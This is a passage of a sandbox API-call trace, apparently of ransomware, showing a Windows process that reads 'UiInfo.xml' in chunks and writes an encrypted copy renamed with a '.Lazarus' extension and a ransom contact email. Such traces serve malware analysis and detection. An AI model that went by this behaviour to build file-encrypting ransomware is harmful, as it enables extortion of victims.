(lpFileName="C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml")) returned 1 [0081.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0081.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0081.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0081.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0081.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0081.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0081.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0081.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0081.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5d0 | out: hHeap=0x20000) returned 1 [0081.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0081.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0081.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0081.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0081.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0081.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0081.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0081.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0081.889] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0081.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.889] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.889] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x97f2, dwReserved0=0x1, dwReserved1=0x0, cFileName="UiInfo.xml", cAlternateFileName="")) returned 1 [0081.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0081.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0081.889] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0081.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0081.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0081.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0081.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0081.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0081.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0081.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0081.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0081.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0081.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0081.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0081.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0081.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0081.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0081.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0081.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0081.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0081.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0081.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0081.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0081.890] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.890] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.890] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.890] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0081.890] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.890] AreFileApisANSI () returned 1 [0081.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\UiInfo.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\UiInfo.xml", lpUsedDefaultChar=0x0) returned 33 [0081.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0081.890] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.890] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0081.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0081.890] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0081.891] AreFileApisANSI () returned 1 [0081.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0081.891] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x68b30 [0081.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x68b30, cchWideChar=33 | out: lpWideCharStr="C:\\588bce7c90097ed212\\UiInfo.xml") returned 33 [0081.891] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0081.891] GetFileType (hFile=0x42c) returned 0x1 [0081.891] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b30 | out: hHeap=0x20000) returned 1 [0081.891] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0081.891] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0081.891] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0081.891] CloseHandle (hObject=0x42c) returned 1 [0081.892] AreFileApisANSI () returned 1 [0081.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0081.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x69300 [0081.892] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=33 | out: lpWideCharStr="C:\\588bce7c90097ed212\\UiInfo.xml") returned 33 [0081.892] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0081.892] GetFileType (hFile=0x42c) returned 0x1 [0081.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0081.892] CloseHandle (hObject=0x42c) returned 1 [0081.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0081.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0081.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0081.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0081.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0081.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0081.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0081.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0081.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0081.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0081.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0081.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0081.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0081.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0081.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0081.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0081.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0081.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0081.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0081.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0081.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0081.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0081.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0081.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0081.893] AreFileApisANSI () returned 1 [0081.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0081.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x68d60 [0081.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=33 | out: lpWideCharStr="C:\\588bce7c90097ed212\\UiInfo.xml") returned 33 [0081.893] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x79a6a00, ftLastWriteTime.dwHighDateTime=0x1ca5de3, nFileSizeHigh=0x0, nFileSizeLow=0x97f2)) returned 1 [0081.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0081.893] AreFileApisANSI () returned 1 [0081.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0081.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0081.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0081.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0081.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0081.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0081.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0081.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0081.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0081.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0081.894] GetLastError () returned 0x0 [0081.894] SetLastError (dwErrCode=0x0) [0081.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e260 [0081.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0081.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0081.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0081.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0081.894] GetLastError () returned 0x0 [0081.894] SetLastError (dwErrCode=0x0) [0081.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0081.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0081.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x68b30 [0081.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0081.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76278 [0081.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b30 | out: hHeap=0x20000) returned 1 [0081.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0081.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0081.894] AreFileApisANSI () returned 1 [0081.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0081.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0081.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=95 | out: lpWideCharStr="C:\\588bce7c90097ed212\\UiInfo.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 95 [0081.894] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0081.895] GetFileType (hFile=0x42c) returned 0x1 [0081.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0081.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0081.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0081.895] AreFileApisANSI () returned 1 [0081.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 33 [0081.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x42) returned 0x68d60 [0081.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e110, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=33 | out: lpWideCharStr="C:\\588bce7c90097ed212\\UiInfo.xml") returned 33 [0081.895] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\UiInfo.xml" (normalized: "c:\\588bce7c90097ed212\\uiinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0081.895] GetFileType (hFile=0x41c) returned 0x1 [0081.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0081.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69db0 [0081.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0081.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0081.895] GetLastError () returned 0x0 [0081.895] SetLastError (dwErrCode=0x0) [0081.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0081.895] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0081.895] GetLastError () returned 0x0 [0081.896] SetLastError (dwErrCode=0x0) [0081.896] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0081.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0081.896] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0081.896] ReadFile (in: hFile=0x41c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0081.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0081.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0081.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0081.897] GetLastError () returned 0x0 [0081.898] SetLastError (dwErrCode=0x0) [0081.898] GetLastError () returned 0x0 [0081.898] SetLastError (dwErrCode=0x0) [0081.898] GetLastError () returned 0x0 [0081.898] SetLastError (dwErrCode=0x0) [0081.898] GetLastError () returned 0x0 [0081.898] SetLastError (dwErrCode=0x0) [0081.898] ReadFile (in: hFile=0x41c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.899] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.900] GetLastError () returned 0x0 [0081.900] SetLastError (dwErrCode=0x0) [0081.900] GetLastError () returned 0x0 [0081.900] SetLastError (dwErrCode=0x0) [0081.900] GetLastError () returned 0x0 [0081.900] SetLastError (dwErrCode=0x0) [0081.900] GetLastError () returned 0x0 [0081.900] SetLastError (dwErrCode=0x0) [0081.900] ReadFile (in: hFile=0x41c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.900] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.900] GetLastError () returned 0x0 [0081.900] SetLastError (dwErrCode=0x0) [0081.901] GetLastError () returned 0x0 [0081.901] SetLastError (dwErrCode=0x0) [0081.901] GetLastError () returned 0x0 [0081.901] SetLastError (dwErrCode=0x0) [0081.901] GetLastError () returned 0x0 [0081.901] SetLastError (dwErrCode=0x0) [0081.901] ReadFile (in: hFile=0x41c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.901] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.901] GetLastError () returned 0x0 [0081.901] SetLastError (dwErrCode=0x0) [0081.901] GetLastError () returned 0x0 [0081.901] SetLastError (dwErrCode=0x0) [0081.902] GetLastError () returned 0x0 [0081.902] SetLastError (dwErrCode=0x0) [0081.902] GetLastError () returned 0x0 [0081.902] SetLastError (dwErrCode=0x0) [0081.902] ReadFile (in: hFile=0x41c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.902] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.902] GetLastError () returned 0x0 [0081.902] SetLastError (dwErrCode=0x0) [0081.902] GetLastError () returned 0x0 [0081.902] SetLastError (dwErrCode=0x0) [0081.902] GetLastError () returned 0x0 [0081.902] SetLastError (dwErrCode=0x0) [0081.902] GetLastError () returned 0x0 [0081.903] SetLastError (dwErrCode=0x0) [0081.903] ReadFile (in: hFile=0x41c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.903] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.903] GetLastError () returned 0x0 [0081.903] SetLastError (dwErrCode=0x0) [0081.903] GetLastError () returned 0x0 [0081.903] SetLastError (dwErrCode=0x0) [0081.903] GetLastError () returned 0x0 [0081.903] SetLastError (dwErrCode=0x0) [0081.903] GetLastError () returned 0x0 [0081.903] SetLastError (dwErrCode=0x0) [0081.903] ReadFile (in: hFile=0x41c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.904] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.904] GetLastError () returned 0x0 [0081.904] SetLastError (dwErrCode=0x0) [0081.904] GetLastError () returned 0x0 [0081.904] SetLastError (dwErrCode=0x0) [0081.904] GetLastError () returned 0x0 [0081.904] SetLastError (dwErrCode=0x0) [0081.904] GetLastError () returned 0x0 [0081.904] SetLastError (dwErrCode=0x0) [0081.904] ReadFile (in: hFile=0x41c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0081.904] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0081.905] GetLastError () returned 0x0 